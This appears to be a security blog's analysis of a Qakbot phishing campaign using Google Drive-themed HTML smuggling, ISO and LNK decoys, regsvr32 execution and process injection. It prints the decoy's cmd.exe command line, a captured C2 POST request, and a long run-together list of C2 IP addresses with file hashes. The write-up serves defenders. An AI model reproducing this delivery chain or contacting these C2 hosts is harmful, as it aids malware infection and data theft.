Qakbot Malware Campaign Using Google Drive Phishing Lure For Spreading


Executive Summary 

  • Qakbot is a modular information stealer also known as QBot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.
  • According to our research, Qakbot has been using HTML attachments with faked Adobe messages since at least July 2022. This week, they introduced two new variants mimicking either Google Drive and Dropbox page.
  • Qakbot Malware delivered by HTML Smuggling technique, if victim user clicks on the attached HTML file on Phishing Email, with help of JavaScript code inside the HTML file, it will drop the Encrypted ZIP folder that contains the Qakbot Malware.   
  • After the Delivery mechanism, Qakbot Malware can be executed by a simple user click on a decoyed shortcut file (LNK) called as Cancellation. This shortcut file is decoyed as a normal folder but this is a part of Social Engineering technique, after a user click it will trigger the execution of Qakbot Malware by regsvr32.exe.

Technical Analysis 

HTML Smuggling With Google Drive Phishing Lure

During our research we observed multiple Qakbot Malware samples using Google Drive Phishing Lure to trick the victims. This technique is being used during the delivery mechanism.

HTML Smuggling in action, it drops a ZIP folder that contains a malicious ISO Image.

Decoy Shortcut (LNK) File Loading Qakbot Malware 

When we open up the Encrypted ZIP folder, we can observe an ISO file that contains Qakbot Malware. Decoy shortcut (LNK) file and Qakbot DLL is stored inside the same ISO image. ISO files can be opened and mounted on disk by User click.

ISO Image inside Encrypted ZIP folder

If victim user opens the ISO image it will mounted on disk an automatically opened an new File Explorer window like the image below :  

Decoy Shortcut (LNK) file inside ISO image will trigger the Qakbot Malware execution.

Qakbot DLL execution can be triggered by a user click on Decoy Shortcut File (LNK), as we can see on above image, LNK file contains Target section which is being used to execute command line arguments by CMD.exe

Full Command Line Arguments on Target Section :

C:\Windows\System32\cmd.exe /c inexhaustive\downloading.cmd regs v

We can see that CMD.exe execute a batch file called as downloading.cmd, if we go inside inexhaustive folder path and read the batch script, we can clearly state that, downloading.cmd being used to execute Qakbot DLL via regsvr32.exe

subscriptions.dat is the Qakbot DLL :

downloading.cmd batch file.

Process Injection on Wermgr.exe

After the execution of Qakbot DLL, we can observe a Process Injection method done by Qakbot Malware to avoid Anti Malware detection

Qakbot malware starts itself by an Injected process named as wermgr.exe, after a short Sleep function (2 second of sleep to avoid memory detection) it makes connection to multiple command and control servers to access victim devices remotely.

Disassembled Qakbot Malware 

Analysis of Unpacked Qakbot Malware 

In below picture we can see the Injected DLL on wermgr.exe process : 

We can extract this section from the memory and then continue our analysis by having the unpacked version of Qakbot Malware.

Qakbot checks if it’s running under the Windows Defender sandbox by checking the existence of a specific subdirectory titled: C:\\INTERNAL\\__empty, if this folder exists, the malware will terminates itself:

Debugging the Qakbot Malware.

Qakbot creates a persistence subdirectory with a randomly-generated name under the %APPDATA%\Microsoft directory. This folder is used to drop the in-memory Qakbot binary for persistence across every reboot.

The malware will then enumerate running processes to detect any antivirus (AV) products on the machine. The image below contains a list of AV vendors QBOT reacts to:

If one of these processes has been founded by Qakbot, it will immediately terminate itself or perform actions to evade them, depending on which AV vendor is being detected by Qakbot.

Extracted Process Name Checklist (AV Vendors) on Qakbot Malware.

Command and Control Communication 

With the help of a C2 connection the operators behind QakBot can remotely control the malware and deploy additional malicious modules. QakBot will store its configuration and command and control server list on Windows Registry of the infected system as Encrypted (RC4) format.

Below table is an example of a POST request sent by Qakbot to its C2 Server:

POST /t5 HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like GeckoHost: 191.33.187.218:2222Content-Length: 75Cache-Control: no-cache
syuslt=JIzsvIkCCQ/mKd8qy8BISSmso7MwenJbTl/Sj6iFRcg+fxy/XXaloVGOjnQofoiNiQ==

Indicator of compromise (IOC)

Command and Control Servers

197.204.53.242:443105.106.60.149:443102.159.110.79:99564.207.237.118:443156.216.134.70:995180.151.116.67:443190.199.97.108:993206.1.203.0:443186.188.96.197:443206.1.128.203:443201.249.100.208:995190.75.151.66:2222198.2.51.242:99390.165.109.4:222271.199.168.185:443181.56.171.3:99543.241.159.148:44341.103.1.16:44324.207.97.117:443105.157.86.118:443201.223.169.238:3210047.14.229.4:44370.60.142.214:222241.47.249.185:443142.181.183.42:222241.62.165.152:44341.97.205.96:44341.97.14.60:443151.213.183.141:99575.84.234.68:443186.18.210.16:44341.96.204.196:44364.123.103.123:443186.48.174.77:995152.170.17.136:443160.176.151.70:99578.179.135.247:443191.33.187.192:222241.140.63.187:44398.207.190.55:443196.65.217.253:99578.50.124.220:44391.171.72.214:32100186.154.189.162:995101.109.44.197:99597.92.4.205:844341.36.159.36:99370.115.104.126:443181.44.34.172:44388.240.75.201:443113.162.196.232:443156.197.230.148:99524.130.228.100:44341.109.228.108:99524.177.111.153:44360.54.65.27:443189.129.38.158:2222190.203.51.133:222296.46.230.10:443222.117.141.133:443190.207.137.189:2222208.78.220.120:443105.108.133.151:44341.104.155.245:44365.140.11.170:443184.159.76.47:443105.98.223.169:443190.201.145.155:443197.0.225.39:44341.101.193.38:443105.155.151.29:995196.207.146.151:443190.37.112.223:222214.54.83.15:44393.156.96.171:44358.186.75.42:443189.110.3.60:2222186.18.77.99:44341.107.78.169:443149.126.159.224:443156.196.169.222:443190.100.149.122:9951.0.215.176:443202.5.53.143:443206.1.199.156:2087102.156.162.83:443220.134.54.185:222288.132.109.147:443190.29.228.61:44341.101.183.90:44394.36.5.31:443102.184.30.42:443102.187.63.127:995190.33.87.140:443187.198.16.39:44362.46.231.64:44342.116.54.220:443197.244.142.102:443190.203.106.109:2222200.155.61.245:995
File NameSHA 256 Hash
subscriptions.date60d2c82e95df823c9dc20214260054af00b56e5ad7a0e43c391f6b896556040
downloading.cmd03b8d788005825c4673fce9d0bfa9062d98b0f45ed2a58e9e84e56b3c298da67
Cancellation.lnk3e5bf080807bb38ceab0c79fb78301fdd7c2ddeea48747782d11af25ed3f015b
Cancellation#2665.iso624d3aff0e8590f0c0621583b81c88401121e12865dfb1a216f46cb68090ac5e
Cancellation_3294.htmlff185240002d2d01d6a15c323ae6d96b8380e813a68f2fb387e52aadd96a1158
Unpacked_Qakbot.dll4405116c97462f3f6e050ec377c9a07899294177b0ad4e34e5da54ceb3c140c6

MITRE ATT&CK TTPs

TacticTechnique
Initial AccessT1566.001 – Phishing: Spear Phishing Attachment
Initial AccessT1566.002 – Phishing: Spear Phishing Link
ExecutionT1027 – Obfuscated Files or Information
ExecutionT1204.002 – User Execution: Malicious File
PersistenceT1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Defense EvasionT1055 – Process Injection
Defense EvasionT1027.002 – Obfuscated Files or Information: Software Packing
Defense EvasionT1497.001 – Virtualization/Sandbox Evasion: System Checks
Command and ControlT1071.001 – Application Layer Protocol: Web Protocols
Defense EvasionT1055.012 – Process Injection: Process Hollowing
Defense EvasionT1027.006 – Obfuscated Files or Information: HTML Smuggling

Leave a Reply

Your email address will not be published. Required fields are marked *